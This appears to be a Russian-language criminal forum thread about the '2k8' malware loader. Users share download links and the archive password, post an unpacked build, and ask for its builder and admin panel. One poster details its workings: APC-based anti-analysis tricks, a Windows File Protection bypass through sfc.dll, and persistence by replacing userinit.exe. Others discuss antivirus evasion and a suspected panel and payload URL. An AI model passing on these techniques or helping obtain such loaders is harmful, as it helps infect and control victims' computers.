2k8 loader

[Ar3s]

Только что скинул один чел мне лоадер 2k8. (я не тестил пока еще, времени нет)
Вроде в архиве есть все.
Билд под upx, путь нужно ручками править.

Всем желающим побаловаться - Скачать
Пасс xss.pro/

p.s. кто первый снимет upx - скиньте в тему готовый exe. Что бы всем следующим не приходилось велосипед изобретать.

 

[GOONER]

upx снял
Скачать|Download

 

[Mr.Di]

а билдера нет чтоли всё еще нормального?

 

[Ar3s]

У меня нету, к сожалению.

 

[karabas-barabas]

билдер это olydbg и hex редактор , попытался с наскока реверснуть, но что-то не пошло да и времени немного было.
Увидел интересный прием - использование SleepEx и QueueUserApc, через SleepEx переводит поток в Alertable состояние - благодаря чему при QueueUserApc исполняется процедура в контексте этого потока. Наверное эта хрень усложняет отладку или убивает эвристику и антиэмуляторы.

Добавлено в [time]1279002160[/time]
вот только щас увидел реверс кто-то уже делал был http://xakepy.cc/showthread.php?t=59142

..........
имхо не актуально, метод пробива почти один в один как и у MyLoader - палиться уже наверное многими аверами по крайней мере kis 2010 палит это. К тому же патчит системный файл - это не есть тру , например авира ругается на такое и предлагает восстановить/удалить пропатченный сист файл

 

[wutang]

есть билдер в "преватах" ))))

 

[DarckSol]

попробовал погонять то, что выложили... после запуска лоадера упала винда, и больше не заработала...

 

[karabas-barabas]

Далее находит файл userinit.exe переименовывает его в stu2.exe делаеат обход WFP(WindowsFileProtection (т.е вызов sfc.dll c ординалом #5)) и заменеят userinit своим телом. При запуске Windows запускается наш бот, после чего подгружет stu2.exe,т.е userinit.exe. Иначе мы просто не загрузимся.

да вообще херня полная этот лодырь, имхо так чудить.
переименуй Windows\System32\stu2.exe в userinit.exe

главное заповедь Rat-софта - не убий винду юзера !

 

[TrueUser]

главное заповедь Rat-софта - не убий винду юзера !

Ну и как показывает практика - большинство проблем с софтом не в аверах а в неработоспособном коде на части машин.

 

[GOONER]

~ © Лоадер-резидент /2k9/ ~
Существует ли эта версия?
Вот наткнулся :

http://zkleman.net/admin/

 

[Ar3s]

Насколько мне известно, автор /2k8/, после прекращения поддержки клиентов, не закончил свои работы над лоадером. И в настоящее время для избранных пишет (или писал до недавнего времени) новые версии и плюшки.
Ссыль которую ты выложил - несколько смущает меня. Я сомневаюсь что кто-то сильно возгордился своим творением, чтобы в авторизации палить админку от лоадера. Больше похоже на фейк или хонейпот.
Так же этой ссылкой интересовались многие форумы. Обсуждения легко найти в гугле.

p.s. по запросу "лоадер резидент /2k9/" эта ссылка первая

 

[GOONER]

Да ссыль реально сомнительная...
Тут файлег, что грузиться

zkleman.net/file.php?upd

 

[DarckSol]

Выложите админку плиз

 

[GOONER]

Скачать|Download
pass:xss.pro/